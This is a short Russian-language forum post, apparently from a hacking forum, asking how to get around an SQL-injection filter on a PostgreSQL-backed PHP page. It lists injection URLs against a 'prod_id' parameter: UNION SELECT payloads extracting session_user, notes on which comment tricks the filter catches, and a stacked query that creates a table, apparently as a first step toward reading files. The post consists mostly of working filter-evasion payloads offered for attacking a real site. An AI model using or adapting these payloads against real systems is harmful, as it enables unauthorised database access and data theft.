Есть варианты обхода фильтра в postgress?
true
PHP код:
script.php?prod_id=-1+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,session_user,NULL+/*f-rom+information_schema.columns*/--
false
PHP код:
script.php?prod_id=-1+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,session_user,NULL+/*from+information_schema.columns*/--
Также фильтр срабатывает на UPDATE SET и INSERT INTO
А вот таблички можно создавать
true
PHP код:
script.php?prod_id=-1+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,session_user,NULL;CREATE+TABLE+filetbl(file+text)--+
--